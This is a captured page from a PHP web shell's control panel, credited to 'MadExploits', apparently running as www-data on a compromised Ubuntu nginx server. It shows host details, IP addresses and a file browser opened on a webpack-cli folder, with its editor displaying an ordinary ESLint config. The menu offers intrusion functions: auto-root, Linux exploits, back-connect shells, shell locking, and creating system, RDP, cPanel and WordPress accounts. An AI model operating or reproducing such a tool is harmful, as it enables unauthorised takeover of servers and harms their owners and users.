Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
webpack-cli /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.eslintrc.js
1.42
KB
-rw-r--r--
cli.js
10.49
KB
-rw-r--r--
opencollective.js
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc.js
module.exports = { root: true, plugins: ["node"], extends: ["../.eslintrc.js", "plugin:node/recommended"], env: { node: true, es6: true, jest: true }, parserOptions: { ecmaVersion: 2017, sourceType: "module" }, rules: { "node/no-unsupported-features": ["error", { version: 6 }], "node/no-deprecated-api": "error", "node/no-missing-import": "error", "node/no-missing-require": [ "error", { resolvePaths: ["./packages"], allowModules: [ "webpack", "@webpack-cli/generators", "@webpack-cli/init", "@webpack-cli/migrate", "@webpack-cli/utils", "@webpack-cli/generate-loader", "@webpack-cli/generate-plugin", "@webpack-cli/webpack-scaffold" ] } ], "node/no-unpublished-bin": "error", "node/no-unpublished-require": [ "error", { allowModules: [ "webpack", "webpack-dev-server", "@webpack-cli/generators", "@webpack-cli/init", "@webpack-cli/migrate", "@webpack-cli/utils", "@webpack-cli/generate-loader", "@webpack-cli/generate-plugin", "@webpack-cli/webpack-scaffold" ] } ], "node/no-extraneous-require": [ "error", { allowModules: [ "@webpack-cli/migrate", "@webpack-cli/generators", "@webpack-cli/utils", "@webpack-cli/generate-loader", "@webpack-cli/generate-plugin", "@webpack-cli/webpack-scaffold" ] } ], "node/process-exit-as-throw": "error" } };
Close